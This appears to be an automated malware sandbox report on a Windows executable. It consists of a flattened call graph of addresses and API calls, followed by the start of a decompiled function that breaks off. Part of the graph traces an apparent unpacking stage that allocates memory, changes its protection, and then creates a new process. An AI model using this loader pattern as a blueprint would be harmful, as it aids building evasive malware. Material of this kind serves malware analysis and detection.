3 library calls 43440->43455 43442 407876 43443 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 43442->43443 43445 407883 43443->43445 43444->43440 43446 41246b 251 API calls 43444->43446 43449 412611 43444->43449 43445->43430 43446->43444 43448->43437 43450 412672 43449->43450 43451 412625 43449->43451 43450->43444 43451->43450 43453 41263c 43451->43453 43461 406436 2 API calls 4 library calls 43451->43461 43453->43450 43456 40773c 43453->43456 43455->43442 43457 40684f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 43456->43457 43458 407759 43457->43458 43459 40705f 15 API calls 43458->43459 43460 407779 43459->43460 43460->43450 43461->43453 43462->42956 43463->42954 43465 40d725 43464->43465 43466 40d73d 43465->43466 43518 406436 2 API calls 4 library calls 43465->43518 43508 424385 43466->43508 43469 40d743 43469->42982 43493 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43469->43493 43471 408bca 453 API calls 43470->43471 43472 404814 43471->43472 43472->43021 43474 40ed96 109 API calls 43473->43474 43475 40548a 43474->43475 43476 4054ac 43475->43476 43477 40549a SetWindowLongA 43475->43477 43476->43021 43477->43476 43521 42143d DefWindowProcA 43478->43521 43481 40750b 43481->43021 43482 4074fe InvalidateRect 43482->43481 43484 42143d 10 API calls 43483->43484 43485 41326e 43484->43485 43485->43021 43528 409dd7 43486->43528 43490 405101 43490->43021 43491->42961 43492->42972 43493->42982 43494->42982 43495->42963 43496->42969 43498->43024 43499->43025 43501 422e12 43500->43501 43502 422e1e 43500->43502 43534 422dd3 43501->43534 43502->43021 43504 422e17 DeleteDC 43504->43502 43506->42981 43507->42975 43509 424395 43508->43509 43510 42439a 43508->43510 43519 406436 2 API calls 4 library calls 43509->43519 43512 4243a8 43510->43512 43520 42431c InitializeCriticalSection 43510->43520 43514 4243e4 EnterCriticalSection 43512->43514 43515 4243ba EnterCriticalSection 43512->43515 43514->43469 43516 4243c6 InitializeCriticalSection 43515->43516 43517 4243d9 LeaveCriticalSection 43515->43517 43516->43517 43517->43514 43518->43465 43519->43510 43520->43512 43522 4074ee 43521->43522 43523 421464 GetWindowRect 43521->43523 43522->43481 43522->43482 43524 421491 43523->43524 43525 4214ed 43523->43525 43524->43525 43526 42149d SetRect InvalidateRect SetRect InvalidateRect 43524->43526 43525->43522 43527 4214fd SetRect InvalidateRect SetRect InvalidateRect 43525->43527 43526->43525 43527->43522 43529 40ed96 109 API calls 43528->43529 43530 409de4 43529->43530 43531 4050fa 43530->43531 43532 409c7d 130 API calls 43530->43532 43533 40474e 115 API calls ~_Task_impl 43531->43533 43532->43531 43533->43490 43535 422de0 43534->43535 43537 422de7 ctype 43534->43537 43538 422d15 112 API calls 4 library calls 43535->43538 43537->43504 43538->43537 43549 4014f0 43539->43549 43541 429320 GetShortPathNameA 43542 429333 43541->43542 43543 429341 43541->43543 43551 402830 82 API calls ctype 43542->43551 43545 40a356 82 API calls 43543->43545 43546 42934a 43545->43546 43547 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 43546->43547 43548 416ac5 PathFindFileNameA 43547->43548 43548->42348 43550 40150d ctype 43549->43550 43550->43541 43551->43543 43552->42356 43553 44d144 43558 4498f9 43553->43558 43559 41f363 ctype 112 API calls 43558->43559 43560 449903 43559->43560 43561 449914 43560->43561 43566 438d85 113 API calls 9 library calls 43560->43566 43563 430b0e 43561->43563 43567 430ad2 43563->43567 43565 430b1b 43566->43561 43568 430ade __lseeki64 43567->43568 43575 4339cb 43568->43575 43574 430aff __lseeki64 43574->43565 43601 43a0bf 43575->43601 43577 430ae3 43578 4309e7 43577->43578 43610 435eef TlsGetValue 43578->43610 43581 435eef __decode_pointer 7 API calls 43582 430a0b 43581->43582 43583 430a8e 43582->43583 43622 4344b4 70 API calls 4 library calls 43582->43622 43598 430b08 43583->43598 43585 430a29 43586 430a75 43585->43586 43589 430a53 43585->43589 43590 430a44 43585->43590 43587 435e74 __encode_pointer 7 API calls 43586->43587 43588 430a83 43587->43588 43591 435e74 __encode_pointer 7 API calls 43588->43591 43589->43583 43593 430a4d 43589->43593 43623 438222 75 API calls _realloc 43590->43623 43591->43583 43593->43589 43596 430a69 43593->43596 43624 438222 75 API calls _realloc 43593->43624 43595 430a63 43595->43583 43595->43596 43625 435e74 TlsGetValue 43596->43625 43639 4339d4 43598->43639 43602 43a0e7 EnterCriticalSection 43601->43602 43603 43a0d4 43601->43603 43602->43577 43608 439ffc 69 API calls 9 library calls 43603->43608 43605 43a0da 43605->43602 43609 43395f 69 API calls 3 library calls 43605->43609 43607 43a0e6 43607->43602 43608->43605 43609->43607 43611 435f07 43610->43611 43612 435f28 GetModuleHandleW 43610->43612 43611->43612 43613 435f11 TlsGetValue 43611->43613 43614 435f43 GetProcAddress 43612->43614 43615 435f38 43612->43615 43619 435f1c 43613->43619 43621 435f20 43614->43621 43637 43392f Sleep GetModuleHandleW 43615->43637 43617 435f53 RtlDecodePointer 43618 4309fb 43617->43618 43618->43581 43619->43612 43619->43621 43620 435f3e 43620->43614 43620->43618 43621->43617 43621->43618 43622->43585 43623->43593 43624->43595 43626 435ead GetModuleHandleW 43625->43626 43627 435e8c 43625->43627 43629 435ec8 GetProcAddress 43626->43629 43630 435ebd 43626->43630 43627->43626 43628 435e96 TlsGetValue 43627->43628 43634 435ea1 43628->43634 43636 435ea5 43629->43636 43638 43392f Sleep GetModuleHandleW 43630->43638 43632 435ee0 43632->43586 43633 435ed8 RtlEncodePointer 43633->43632 43634->43626 43634->43636 43635 435ec3 43635->43629 43635->43632 43636->43632 43636->43633 43637->43620 43638->43635 43642 439fe5 LeaveCriticalSection 43639->43642 43641 430b0d 43641->43574 43642->43641 43643 40f720 43644 40f733 43643->43644 43650 40f72e 43643->43650 43645 40ee68 112 API calls 43644->43645 43646 40f73d 43645->43646 43647 40f758 DefWindowProcA 43646->43647 43648 40f746 43646->43648 43647->43650 43649 40f62d 453 API calls 43648->43649 43649->43650 43651 4037c0 43688 403130 43651->43688 43662 4035a0 112 API calls 43663 403811 43662->43663 43664 403690 108 API calls 43663->43664 43665 40381a 43664->43665 43666 4035a0 112 API calls 43665->43666 43667 40382b 43666->43667 43668 403690 108 API calls 43667->43668 43669 403834 43668->43669 43670 4035a0 112 API calls 43669->43670 43671 403845 43670->43671 43672 403690 108 API calls 43671->43672 43673 40384e 43672->43673 43721 402ef0 LoadStringW 43673->43721 43675 403884 43726 430d56 43675->43726 43678 4035a0 112 API calls 43679 4038aa 43678->43679 43680 403690 108 API calls 43679->43680 43681 4038b3 ctype 43680->43681 43682 4038cb VirtualAlloc 43681->43682 43683 4038f7 __setlocale_set_cat 43682->43683 43684 402ef0 71 API calls 43683->43684 43685 403908 43684->43685 43730 403700 108 API calls std::ios_base::_Init 43685->43730 43687 403920 ctype 43689 403166 43688->43689 43731 402fd0 43689->43731 43691 40326d 43737 4030c0 43691->43737 43696 403340 43697 402fd0 71 API calls 43696->43697 43698 403380 43697->43698 43700 403388 43698->43700 43747 448692 43698->43747 43699 403432 43701 4030c0 71 API calls 43699->43701 43700->43699 43773 402d20 70 API calls 3 library calls 43700->43773 43703 403441 43701->43703 43705 402f80 43703->43705 43706 402f94 43705->43706 43707 402fcb 43706->43707 43860 402d20 70 API calls 3 library calls 43706->43860 43709 4035a0 43707->43709 43861 401af0 GetPEB 43709->43861 43711 4035cc ctype 43712 402ef0 71 API calls 43711->43712 43715 430d56 80 API calls 43711->43715 43716 4035df 43711->43716 43862 430fcd 80 API calls 2 library calls 43711->43862 43863 403470 43711->43863 43712->43711 43715->43711 43717 403690 43716->43717 43718 4036dd 43717->43718 43720 4036c2 43717->43720 43718->43662 43719 403470 108 API calls 43719->43720 43720->43718 43720->43719 43722 402f16 43721->43722 43723 402f3e 43721->43723 43870 402ab0 70 API calls 2 library calls 43722->43870 43723->43675 43725 402f38 43725->43675 43727 430d40 43726->43727 43871 43882f 43727->43871 43730->43687 43732 403014 43731->43732 43733 40300c 43731->43733 43735 403037 43732->43735 43736 402f80 70 API calls 43732->43736 43744 4474d7 EnterCriticalSection std::_Lockit::_Lockit 43733->43744 43735->43691 43743 402d20 70 API calls 3 library calls 43735->43743 43736->43735 43738 4030f5 43737->43738 43740 403100 43738->43740 43745 403060 70 API calls 43738->43745 43741 40311f 43740->43741 43746 4474e0 LeaveCriticalSection _tidy_global 43740->43746 43741->43696 43743->43691 43744->43732 43745->43740 43746->43741 43748 44869e __EH_prolog3_GS 43747->43748 43750 4486a8 43748->43750 43752 4486fa 43748->43752 43753 4486eb 43748->43753 43777 431b87 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 43750->43777 43778 448494 70 API calls 2 library calls 43752->43778 43774 447f97 43753->43774 43756 448708 43779 44818f 7 API calls ctype 43756->43779 43758 448717 43780 44794f 7 API calls ctype 43758->43780 43760 44871e 43781 44818f 7 API calls ctype 43760->43781 43762 44872f 43782 44794f 7 API calls ctype 43762->43782 43764 448810 43765 447f97 _Fputc 105 API calls 43764->43765 43767 44880e 43764->43767 43765->43767 43785 402090 69 API calls 2 library calls 43767->43785 43770 44794f 7 API calls ctype 43772 448736 43770->43772 43771 44818f 7 API calls ctype 43771->43772 43772->43764 43772->43767 43772->43770 43772->43771 43783 449e18 105 API calls 3 library calls 43772->43783 43784 448268 70 API calls 3 library calls 43772->43784 43773->43699 43786 449aac 43774->43786 43776 447fa9 43776->43750 43778->43756 43779->43758 43780->43760 43781->43762 43782->43772 43783->43772 43784->43772 43785->43767 43787 449ab8 __lseeki64 43786->43787 43788 449aeb 43787->43788 43789 449acb 43787->43789 43805 440114 43788->43805 43832 431d3e 69 API calls __getptd_noexit 43789->43832 43792 449ad0 43833 4367e9 7 API calls 2 library calls 43792->43833 43795 449b6b 43797 449b7c 43795->43797 43811 43681f 43795->43811 43842 449bb0 LeaveCriticalSection LeaveCriticalSection _setvbuf 43797->43842 43800 449ae0 __lseeki64 43800->43776 43803 449b5b 43841 4367e9 7 API calls 2 library calls 43803->43841 43806 440126 43805->43806 43807 440148 EnterCriticalSection 43805->43807 43806->43807 43809 44012e 43806->43809 43808 44013e 43807->43808 43808->43795 43834 4401f2 43808->43834 43810 43a0bf __lock 69 API calls 43809->43810 43810->43808 43812 4401f2 __fileno 69 API calls 43811->43812 43813 43682f 43812->43813 43814 436851 43813->43814 43815 43683a 43813->43815 43817 436855 43814->43817 43825 436862 __flsbuf 43814->43825 43846 431d3e 69 API calls __getptd_noexit 43815->43846 43847 431d3e 69 API calls __getptd_noexit 43817->43847 43819 4368c3 43820 436952 43819->43820 43821 4368d2 43819->43821 43851 43feb4 103 API calls 4 library calls 43820->43851 43823 4368e9 43821->43823 43828 436906 43821->43828 43849 43feb4 103 API calls 4 library calls 43823->43849 43825->43819 43827 43683f 43825->43827 43829 4368b8 43825->43829 43848 43ffd9 69 API calls __lseeki64 43825->43848 43827->43797 43828->43827 43850 43f668 73 API calls 3 library calls 43828->43850 43829->43819 43843 43ff90 43829->43843 43832->43792 43835 440201 43834->43835 43839 440216 43834->43839 43858 431d3e 69 API calls __getptd_noexit 43835->43858 43837 440206 43859 4367e9 7 API calls 2 library calls 43837->43859 43839->43795 43840 431d3e 69 API calls __getptd_noexit 43839->43840 43840->43803 43842->43800 43852 438191 43843->43852 43846->43827 43847->43827 43848->43829 43849->43827 43850->43827 43851->43827 43855 43819a 43852->43855 43853 43108c _malloc 68 API calls 43853->43855 43854 4381d0 43854->43819 43855->43853 43855->43854 43856 4381b1 Sleep 43855->43856 43857 4381c6 43856->43857 43857->43854 43857->43855 43858->43837 43860->43707 43861->43711 43862->43711 43865 403483 43863->43865 43867 40358c 43863->43867 43864 403130 72 API calls 43864->43865 43865->43864 43866 403340 108 API calls 43865->43866 43865->43867 43869 402d20 70 API calls 3 library calls 43865->43869 43866->43865 43867->43711 43869->43865 43870->43725 43872 438848 43871->43872 43875 438635 43872->43875 43887 430d81 43875->43887 43877 43865c 43895 431d3e 69 API calls __getptd_noexit 43877->43895 43880 438661 43896 4367e9 7 API calls 2 library calls 43880->43896 43883 438698 43884 4386bc wcstoxl 43883->43884 43897 440664 80 API calls 2 library calls 43883->43897 43886 40389f 43884->43886 43898 431d3e 69 API calls __getptd_noexit 43884->43898 43886->43678 43888 430d94 43887->43888 43892 430de1 43887->43892 43899 436178 69 API calls 2 library calls 43888->43899 43890 430d99 43891 430dc1 43890->43891 43900 439212 77 API calls 6 library calls 43890->43900 43891->43892 43901 438a80 71 API calls 6 library calls 43891->43901 43892->43877 43892->43883 43895->43880 43897->43883 43898->43886 43899->43890 43900->43891 43901->43892 43902 414c85 43903 414c93 43902->43903 43906 414b9c 43903->43906 43907 414c59 43906->43907 43911 414bd2 43906->43911 43908 414bd3 RegOpenKeyExA 43908->43911 43909 414bf0 RegQueryValueExA 43909->43911 43910 414c42 RegCloseKey 43910->43911 43911->43907 43911->43908 43911->43909 43911->43910 43912 435ee6 43913 435e74 __encode_pointer 7 API calls 43912->43913 43914 435eed 43913->43914 43915 44cfc1 43920 42041b 43915->43920 43917 44cfcb 43918 430b0e __cinit 76 API calls 43917->43918 43919 44cfd5 43918->43919 43925 4203bf 8 API calls 43920->43925 43922 420427 43926 420379 7 API calls 43922->43926 43924 420433 LoadCursorA LoadCursorA 43924->43917 43925->43922 43926->43924 43927 410b6d 43954 431ace 43927->43954 43929 410b79 GetPropA 43930 410ba3 43929->43930 43931 410c46 43929->43931 43932 410c25 43930->43932 43933 410ba8 43930->43933 43934 40ee3c ~_Task_impl 113 API calls 43931->43934 43938 40ee3c ~_Task_impl 113 API calls 43932->43938 43935 410bad 43933->43935 43936 410bfe SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 43933->43936 43937 410c4e 43934->43937 43939 410c64 CallWindowProcA 43935->43939 43940 410bb8 43935->43940 43936->43939 43941 40ee3c ~_Task_impl 113 API calls 43937->43941 43942 410c2b 43938->43942 43949 410bf3 std::_Locinfo::~_Locinfo 43939->43949 43944 40ee3c ~_Task_impl 113 API calls 43940->43944 43945 410c56 43941->43945 43957 410af5 121 API calls 2 library calls 43942->43957 43947 410bbe 43944->43947 43958 410a7d 120 API calls 43945->43958 43946 410c3d 43950 410c60 43946->43950 43955 40d7c1 GetWindowRect GetWindowLongA 43947->43955 43950->43939 43950->43949 43952 410bce CallWindowProcA 43956 40f5b7 148 API calls ctype 43952->43956 43954->43929 43955->43952 43956->43949 43957->43946 43958->43950 43959 43156e 43998 431818 43959->43998 43961 43157a GetStartupInfoA 43962 43159d 43961->43962 43999 43abb6 HeapCreate 43962->43999 43965 4315ed 44001 43632f GetModuleHandleW 43965->44001 43969 4315fe __RTC_Initialize 44035 43b789 43969->44035 43972 43160c 43973 431618 GetCommandLineA 43972->43973 44125 43395f 69 API calls 3 library calls 43972->44125 44050 43b652 43973->44050 43976 431617 43976->43973 43980 43163d 44086 43b31f 43980->44086 43984 43164e 44101 433a1e 43984->44101 43987 431655 43988 431660 43987->43988 44128 43395f 69 API calls 3 library calls 43987->44128 44107 43b2c0 43988->44107 43994 43168f 44130 433bfb 69 API calls _doexit 43994->44130 43997 431694 __lseeki64 43998->43961 44000 4315e1 43999->44000 44000->43965 44123 431545 69 API calls 3 library calls 44000->44123 44002 436343 44001->44002 44003 43634a 44001->44003 44131 43392f Sleep GetModuleHandleW 44002->44131 44005 4364b2 44003->44005 44006 436354 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 44003->44006 44141 435fdb 72 API calls 2 library calls 44005->44141 44008 43639d TlsAlloc 44006->44008 44007 436349 44007->44003 44010 4315f3 44008->44010 44012 4363eb TlsSetValue 44008->44012 44010->43969 44124 431545 69 API calls 3 library calls 44010->44124 44012->44010 44013 4363fc 44012->44013 44132 433c19 7 API calls 4 library calls 44013->44132 44015 436401 44016 435e74 __encode_pointer 7 API calls 44015->44016 44017 43640c 44016->44017 44018 435e74 __encode_pointer 7 API calls 44017->44018 44019 43641c 44018->44019 44020 435e74 __encode_pointer 7 API calls 44019->44020 44021 43642c 44020->44021 44022 435e74 __encode_pointer 7 API calls 44021->44022 44023 43643c 44022->44023 44133 439f43 InitializeCriticalSectionAndSpinCount ___lock_fhandle 44023->44133 44025 436449 44025->44005 44026 435eef __decode_pointer 7 API calls 44025->44026 44027 43645d 44026->44027 44027->44005 44134 4381d6 44027->44134 44030 435eef __decode_pointer 7 API calls 44031 436490 44030->44031 44031->44005 44032 436497 44031->44032 44140 436018 69 API calls 5 library calls 44032->44140 44034 43649f GetCurrentThreadId 44034->44010 44160 431818 44035->44160 44037 43b795 GetStartupInfoA 44038 4381d6 __calloc_crt 69 API calls 44037->44038 44045 43b7b6 44038->44045 44039 43b9d4 __lseeki64 44039->43972 44040 43b951 GetStdHandle 44044 43b91b 44040->44044 44041 43b9b6 SetHandleCount 44041->44039 44042 4381d6 __calloc_crt 69 API calls 44042->44045 44043 43b963 GetFileType 44043->44044 44044->44039 44044->44040 44044->44041 44044->44043 44162 43c56f InitializeCriticalSectionAndSpinCount __lseeki64 44044->44162 44045->44039 44045->44042 44045->44044 44047 43b89e 44045->44047 44047->44039 44047->44044 44048 43b8c7 GetFileType 44047->44048 44161 43c56f InitializeCriticalSectionAndSpinCount __lseeki64 44047->44161 44048->44047 44051 43b670 GetEnvironmentStringsW 44050->44051 44052 43b68f 44050->44052 44053 43b684 GetLastError 44051->44053 44054 43b678 44051->44054 44052->44054 44055 43b728 44052->44055 44053->44052 44056 43b6ab GetEnvironmentStringsW 44054->44056 44057 43b6ba WideCharToMultiByte 44054->44057 44058 43b731 GetEnvironmentStrings 44055->44058 44059 431628 44055->44059 44056->44057 44056->44059 44061 43b6ee 44057->44061 44062 43b71d FreeEnvironmentStringsW 44057->44062 44058->44059 44063 43b741 44058->44063 44075 43b597 44059->44075 44065 438191 __malloc_crt 69 API calls 44061->44065 44062->44059 44064 438191 __malloc_crt 69 API calls 44063->44064 44067 43b75b 44064->44067 44066 43b6f4 44065->44066 44066->44062 44070 43b6fc WideCharToMultiByte 44066->44070 44068 43b762 FreeEnvironmentStringsA 44067->44068 44069 43b76e __setlocale_set_cat 44067->44069 44068->44059 44073 43b778 FreeEnvironmentStringsA 44069->44073 44071 43b716 44070->44071 44072 43b70e 44070->44072 44071->44062 44163 4316f6 69 API calls 6 library calls 44072->44163 44073->44059 44076 43b5b1 GetModuleFileNameA 44075->44076 44077 43b5ac 44075->44077 44079 43b5d8 44076->44079 44170 438f1f 113 API calls __setmbcp 44077->44170 44164 43b3fd 44079->44164 44081 431632 44081->43980 44126 43395f 69 API calls 3 library calls 44081->44126 44083 438191 __malloc_crt 69 API calls 44084 43b61a 44083->44084 44084->44081 44085 43b3fd _parse_cmdline 79 API calls 44084->44085 44085->44081 44087 43b328 44086->44087 44090 43b32d _strlen 44086->44090 44172 438f1f 113 API calls __setmbcp 44087->44172 44089 431643 44089->43984 44127 43395f 69 API calls 3 library calls 44089->44127 44090->44089 44091 4381d6 __calloc_crt 69 API calls 44090->44091 44096 43b362 _strlen 44091->44096 44092 43b3c0 44175 4316f6 69 API calls 6 library calls 44092->44175 44094 4381d6 __calloc_crt 69 API calls 44094->44096 44095 43b3e6 44176 4316f6 69 API calls 6 library calls 44095->44176 44096->44089 44096->44092 44096->44094 44096->44095 44099 43b3a7 44096->44099 44173 433c67 69 API calls __lseeki64 44096->44173 44099->44096 44174 4366c1 10 API calls 3 library calls 44099->44174 44102 433a2c __IsNonwritableInCurrentImage 44101->44102 44177 43c31e 44102->44177 44104 433a4a __initterm_e 44105 430b0e __cinit 76 API calls 44104->44105 44106 433a69 __IsNonwritableInCurrentImage __initterm 44104->44106 44105->44106 44106->43987 44108 43b2ce 44107->44108 44110 43b2d3 44107->44110 44181 438f1f 113 API calls __setmbcp 44108->44181 44111 431666 44110->44111 44182 434a02 79 API calls x_ismbbtype_l 44110->44182 44113 4498ee 44111->44113 44114 44992f 44113->44114 44183 415ad9 44114->44183 44117 41f363 ctype 112 API calls 44118 449946 44117->44118 44186 42ffa2 SetErrorMode SetErrorMode 44118->44186 44121 431681 44121->43994 44129 433bcf 69 API calls _doexit 44121->44129 44123->43965 44124->43969 44125->43976 44126->43980 44127->43984 44128->43988 44129->43994 44130->43997 44131->44007 44132->44015 44133->44025 44136 4381df 44134->44136 44137 436476 44136->44137 44138 4381fd Sleep 44136->44138 44142 43db85 44136->44142 44137->44005 44137->44030 44139 438212 44138->44139 44139->44136 44139->44137 44140->44034 44141->44010 44143 43db91 __lseeki64 44142->44143 44144 43dba9 44143->44144 44154 43dbc8 _memset 44143->44154 44155 431d3e 69 API calls __getptd_noexit 44144->44155 44146 43dbae 44156 4367e9 7 API calls 2 library calls 44146->44156 44147 43dc3a RtlAllocateHeap 44147->44154 44149 43dbbe __lseeki64 44149->44136 44151 43a0bf __lock 68 API calls 44151->44154 44154->44147 44154->44149 44154->44151 44157 43a8d1 5 API calls 2 library calls 44154->44157 44158 43dc81 LeaveCriticalSection _doexit 44154->44158 44159 43add9 7 API calls __decode_pointer 44154->44159 44155->44146 44157->44154 44158->44154 44159->44154 44160->44037 44161->44047 44162->44044 44163->44071 44166 43b41c 44164->44166 44168 43b489 44166->44168 44171 434a02 79 API calls x_ismbbtype_l 44166->44171 44167 43b587 44167->44081 44167->44083 44168->44167 44169 434a02 79 API calls __wincmdln 44168->44169 44169->44168 44170->44076 44171->44166 44172->44090 44173->44096 44174->44099 44175->44089 44176->44089 44178 43c324 44177->44178 44179 435e74 __encode_pointer 7 API calls 44178->44179 44180 43c33c 44178->44180 44179->44178 44180->44104 44181->44110 44182->44110 44184 41f396 ~_Task_impl 112 API calls 44183->44184 44185 415ade 44184->44185 44185->44117 44187 41f363 ctype 112 API calls 44186->44187 44188 42ffbf 44187->44188 44202 41eb0a 44188->44202 44191 41f363 ctype 112 API calls 44192 42ffd4 44191->44192 44193 42fff1 44192->44193 44210 42fe1c 44192->44210 44195 41f363 ctype 112 API calls 44193->44195 44196 42fff6 44195->44196 44197 430002 GetModuleHandleA 44196->44197 44233 4161f7 44196->44233 44199 430022 44197->44199 44200 430011 GetProcAddress 44197->44200 44201 42eb6a 121 API calls 2 library calls 44199->44201 44200->44199 44201->44121 44239 41ea0e 44202->44239 44205 41eb50 44207 41eb57 SetLastError 44205->44207 44209 41eb64 44205->44209 44206 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 44208 41ec04 44206->44208 44207->44209 44208->44191 44209->44206 44211 41f363 ctype 112 API calls 44210->44211 44212 42fe3b GetModuleFileNameA 44211->44212 44213 42fe63 44212->44213 44214 42fe6c PathFindExtensionA 44213->44214 44246 42282a RaiseException __CxxThrowException@8 44213->44246 44216 42fe83 44214->44216 44217 42fe88 44214->44217 44247 42282a RaiseException __CxxThrowException@8 44216->44247 44248 42fddc 83 API calls 2 library calls 44217->44248 44220 42fea5 44221 42feae 44220->44221 44249 42282a RaiseException __CxxThrowException@8 44220->44249 44232 42fec0 ctype 44221->44232 44250 433ccf 69 API calls 4 library calls 44221->44250 44225 42ff93 44227 430650 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 44225->44227 44229 42ffa0 44227->44229 44229->44193 44231 433ccf 69 API calls __strdup 44231->44232 44232->44225 44232->44231 44251 4063fe RaiseException __CxxThrowException@8 44232->44251 44252 41b239 117 API calls 2 library calls 44232->44252 44253 414fee 69 API calls 2 library calls 44232->44253 44254 4317a1 69 API calls __lseeki64 44232->44254 44234 41f363 ctype 112 API calls 44233->44234 44235 4161fc 44234->44235 44236 416224 44235->44236 44255 41edab 44235->44255 44236->44197 44240 41ea17 GetModuleHandleA 44239->44240 44241 41ea7b GetModuleFileNameW 44239->44241 44242 41ea30 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 44240->44242 44243 41ea2b 44240->44243 44241->44205 44241->44209 44242->44241 44245 406436 2 API calls 4 library calls 44243->44245 44245->44242 44246->44214 44247->44217 44248->44220 44249->44221 44250->44232 44252->44232 44253->44232 44254->44232 44256 420aec ctype 106 API calls 44255->44256 44257 416208 GetCurrentThreadId SetWindowsHookExA 44256->44257 44257->44236 44258 22f0000 44260 22f0005 44258->44260 44263 22f002d 44260->44263 44262 22f0029 44283 22f0467 GetPEB 44263->44283 44266 22f0467 GetPEB 44267 22f0053 44266->44267 44268 22f0467 GetPEB 44267->44268 44269 22f0061 44268->44269 44270 22f0467 GetPEB 44269->44270 44271 22f006d 44270->44271 44272 22f0467 GetPEB 44271->44272 44273 22f007b 44272->44273 44274 22f0467 GetPEB 44273->44274 44277 22f0089 44274->44277 44275 22f00e6 GetNativeSystemInfo 44276 22f0109 VirtualAlloc 44275->44276 44281 22f00a0 44275->44281 44280 22f0135 44276->44280 44277->44275 44277->44281 44278 22f03c3 44278->44281 44285 231cd97 44278->44285 44279 22f0384 VirtualProtect 44279->44280 44279->44281 44280->44278 44280->44279 44281->44262 44284 22f0045 44283->44284 44284->44266 44302 231aec9 44285->44302 44287 231cda8 44305 231be17 44287->44305 44289 231cdad GetModuleFileNameW 44290 231cdcd 44289->44290 44308 2311a52 44290->44308 44292 231cdde 44293 231cdfa GetCommandLineW lstrlenW lstrlenW 44292->44293 44294 231ce3e 44293->44294 44295 231ce45 44294->44295 44296 231ce1f lstrcmpiW 44294->44296 44312 2311cc2 44295->44312 44296->44294 44297 231ce31 44296->44297 44318 231ac49 99 API calls 44297->44318 44301 231ce36 ExitProcess 44319 23112cd GetPEB 44302->44319 44304 231be03 44304->44287 44306 23112cd GetPEB 44305->44306 44307 231cd83 44306->44307 44307->44289 44309 2311a70 44308->44309 44321 23114f2 GetProcessHeap RtlAllocateHeap 44309->44321 44311 2311a84 44311->44292 44311->44311 44313 2311cd9 CreateProcessW 44312->44313 44322 2311503 44312->44322 44315 2311cfc 44313->44315 44316 2311d03 ExitProcess 44313->44316 44315->44316 44317 2311d0f CloseHandle CloseHandle 44315->44317 44317->44316 44318->44301 44320 23112e2 44319->44320 44320->44304 44321->44311 44322->44313 44323 427acd 44324 427ad9 __EH_prolog3 44323->44324 44325 4014c0 ctype 82 API calls 44324->44325 44326 427ae3 44325->44326 44327 4014c0 ctype 82 API calls 44326->44327 44328 427aef 44327->44328 44329 41f363 ctype 112 API calls 44328->44329 44330 427af8 44329->44330 44331 4292e7 84 API calls 44330->44331 44344 427b05 ctype 44331->44344 44332 408692 ctype 2 API calls 44332->44344 44333 405562 82 API calls 44333->44344 44334 427fb7 ctype std::_Locinfo::~_Locinfo 44335 4014c0 82 API calls ctype 44335->44344 44336 41f363 ctype 112 API calls 44337 427b88 ExtractIconA 44336->44337 44337->44344 44338 427bad DestroyCursor 44338->44344 44341 427206 124 API calls 44341->44344 44342 405ec1 82 API calls 44342->44344 44344->44332 44344->44333 44344->44334 44344->44335 44344->44336 44344->44338 44344->44341 44344->44342 44345 40a356 82 API calls 44344->44345 44347 420018 44344->44347 44357 405e21 82 API calls 2 library calls 44344->44357 44358 4056c2 82 API calls ctype 44344->44358 44359 409f00 82 API calls ctype 44344->44359 44345->44344 44348 420024 __EH_prolog3 44347->44348 44349 406039 118 API calls 44348->44349 44350 42002f 44349->44350 44351 42007a RegQueryValueA 44350->44351 44360 4168ab 82 API calls 2 library calls 44350->44360 44352 420099 ctype std::_Locinfo::~_Locinfo 44351->44352 44352->44344 44354 420058 44361 4056c2 82 API calls ctype 44354->44361 44356 420068 ctype 44356->44351 44357->44344 44358->44344 44359->44344 44360->44354 44361->44356

                  Executed Functions

                  Function 004016F0, Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                  Download Yara Rule
                  C-Code - Quality: 76%
                  			E004016F0(void* __ecx, void* __edx, void* __ebp) {
				int _v8;
				char _v12;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _v48;
				intOrPtr _v60;
				void* _v64;
				char _v80;
				char _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				intOrPtr* _t31;
				intOrPtr* _t32;
				intOrPtr* _t34;
				intOrPtr _t35;
				intOrPtr* _t36;
				intOrPtr* _t42;
				long _t52;
				signed int _t54;
				signed int _t55;
				void* _t81;
				intOrPtr* _t86;
				void* _t91;
				void* _t96;
				signed int _t97;
				void* _t98;

				_t81 = __edx;
				_push(0xffffffff);
				_push(E0044A85C);
				_push( *[fs:0x0]);
				_t97 = _t96 - 0x2c;
				_push(_t54);
				_t26 =  *0x463404; // 0x38a11573
				_push(_t26 ^ _t97);
				 *[fs:0x0] =  &_v12;
				_t91 = __ecx;
				_t85 = GetVersion;
				if(GetVersion() >= 0) {
					L4:
					E00414CC5(_t54, _t91, _t81, _t85, _t91, __eflags, 4); // executed
					_t31 = E00404461(__eflags, 0x90);
					_t98 = _t97 + 4;
					_v60 = _t31;
					_v8 = 0;
					__eflags = _t31;
					if(__eflags == 0) {
						_t32 = 0;
						__eflags = 0;
					} else {
						_push(0x44eccc);
						_push(0x44f424);
						_push(0x44f10c);
						_push(0x81);
						_t32 = E004172AA(_t54, _t31, _t81, _t85, _t91, __eflags);
					}
					_t55 = _t54 | 0xffffffff;
					_push(_t32);
					 *(_t98 + 0x48) = _t55;
					E00416787(_t55, _t91, _t85, _t91, __eflags);
					_t34 = E00404461(__eflags, 0x248);
					_t97 = _t98 + 4;
					_v60 = _t34;
					_v8 = 1;
					__eflags = _t34;
					if(_t34 == 0) {
						_t86 = 0;
						__eflags = 0;
					} else {
						_t86 = E00401380();
					}
					_t35 =  *_t86;
					_t82 =  *((intOrPtr*)(_t35 + 0x140));
					_v8 = _t55;
					_t36 =  *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x140))))(0x80, 0xcf8000, 0, 0); // executed
					__eflags = _t36;
					if(__eflags == 0) {
